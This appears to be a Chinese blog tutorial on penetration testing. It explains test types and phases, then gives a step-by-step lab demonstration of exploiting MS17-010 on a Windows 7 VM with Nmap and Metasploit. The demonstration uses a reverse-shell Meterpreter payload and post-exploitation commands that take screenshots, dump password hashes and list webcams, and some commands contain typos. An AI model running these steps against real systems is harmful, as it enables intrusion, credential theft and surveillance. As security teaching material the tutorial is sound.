1. 什么是渗透测试?
渗透测试,就是一种通过模拟恶意攻击者的技术和方式,攻破目标系统安全控制措施,从而取得访问控制权限,并发现具备业务影响后果安全隐患的一种安全测试与评估方法。简而言之,就是通过攻击(渗透) 的手段,来测试对方系统的安全防护能力。
渗透过程的底层基础就是利用目标系统存在的安全漏洞造成入侵或破坏的效果。
利用安全漏洞造成入侵或破坏效果的程序就称为渗透代码,或者漏洞利用代码。
2. 渗透测试分类
黑盒测试/外部测试
白盒测试/内部测试
灰盒测试/组合测试
黑盒测试:简而言之就是对目标网络一无所知,就如盲人摸象一般,用自己已有的攻击技术和工具对目标网络进行攻击测试。
优点:没有被局限思维,有利于挖出系统潜在漏洞以及脆弱环节和薄弱点。
缺点:费时费力,对渗透测试者有较高的技术要求。
白盒测试:是已知目标系统的所有内部和底层信息进行的测试,是为了测试人员以最小的代价发现或是验证系统中最严重的漏洞。
优点:省时省力,能快速发现和解决明显严重的漏洞和运行问题。
缺点:难以应对突发状况和非法人员的突然攻击,缺乏应变能力。
灰盒测试:就是黑盒测试和白盒测试的结合体,能更加全面深入的对目标系统进行测试。
优点:同时发挥两种渗透测试方式的优势。
缺点:同样费时费力且需要内部信息。
3. 渗透目标分类
1.主机操作系统渗透
2.数据库系统渗透
3.应用系统渗透
4.网络设备渗透
4. 渗透测试过程环节
1.前期交互阶段:
与客户进行交互讨论,确定测试的范围、目标、限制条件以及服务合同细节。
(简而言之:找活干)
2.情报搜集阶段:
在目标范围确定后,利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织的网络括扑、系统配置与安全防疫措施的信息。
情报搜集方法包括:公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。
(情报搜集同样非常重要,知己知彼方能百战百胜)
3.威胁建模阶段
根据之前的情报搜集,讨论决定出最可行的进攻通道。
(简而言之:诸位将士共同商议对策,寻找敌军薄弱点与突破口)
4.漏洞分析阶段
根据之前商议出的攻击通道,接下来考虑如何获取目标系统的访问控制权。
(简而言之:到底如何快速有效的击破敌军薄弱点,到底该用什么武器采取什么战术)
5.渗透攻击阶段
利用之前找出的目标系统安全漏洞,来真正入侵系统当中,获得访问权限。
(简而言之:战略制定完毕,将士们真刀真枪的发起进攻,力求胜利)
6.后渗透攻击阶段
是整个渗透测试过程中最体现渗透测试团队创造力和技术能力的阶段。在渗透成功后,去寻找客户组织最具价值和尝试安全保护的信息和资产。
(简而言之:此战胜利已成定局,那么该如何获取更多战利品,如何最大程度的重创敌军乃至毕功于一役)
7.报告阶段
最终向客户提交一份能够被认同且成功获得合同付款的一份渗透测试报告。同时还要站在防御者角度,帮助他们分析安全防御体系中的薄弱环节和存在的问题,以及修补与升级技术方案。
(简而言之:将士们劳苦功高取得胜利后,也要论功领赏,简单明了地向上头汇报战局和胜利,将每个人的功劳奖赏好好的拿到手,总不能人人为爱发电打白工吧。而将领们呢也要吸取敌军失败的经验教训,用以加强训练自己的军队)
纸上得来终觉浅,绝知此事要躬行。
主机漏洞利用演示
MS17-010****
软件:Vmware Workstation 14
攻击机:Kali
靶机环境:Win7
工具:
Nmap 网络扫描工具
Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具
1.打开kali终端,获取root权限
sudo su-kali
2.使用Nmap工具进行扫描
namp -A -T4 -v -Pn 192.168.116.130
扫描可见对方为Windos7系统,且有445端口,因此我们可以尝试用ms17-010进行漏洞攻击。
3.启动Metasploit
msfconsole
启动后就可以用其中的攻击模块了
4.搜索其中的MS17-010模块
search ms17-010
exploit是攻击模块,auxiliary是辅助模块
5.这里选用3辅助扫描模块,来确定漏洞是否存在
use 3
6.然后查看该模块所需参数
Required中的yes选项是必填的,我们可见缺少了RHOSTS的部分
7.获取所需参数目标
set rhosts 192.168.116.130
8.进行扫描看目标是否存在MS17-010漏洞
run
结果显示目标存在该漏洞,直接利用攻击模块进行攻击
9.使用攻击模块
use 0
显示已经切换到攻击模块
10.查看设置与目标参数
show options
可见攻击目标处为空白
11.设置攻击目标
set rhosts 192.168.116.130
set payload windows/x64/meterpreter/reverse_tcp
确认目标参数无误后进行攻击
12.攻击
run
攻击成功,接下来可以利用meterpreter进行一系列后渗透操作
#### 后渗透攻击
截屏
screenshot
查看权限
getuid
进入shell
shell
乱码修改
chcp 65001
查看ip地址
ipconfig
退出shell
exit
查看密码
hasdump
密码为密文需解密网站解密
查看是否存在摄像机
webcam_list
很遗憾,不存在
MS17-010 漏洞防范
打开防火墙
安装安全软件
安装相应的补丁
以上皆为作者拙见,仅做网络安全学习参考。
送给你我:
路漫漫其修远兮,吾将上下而求索。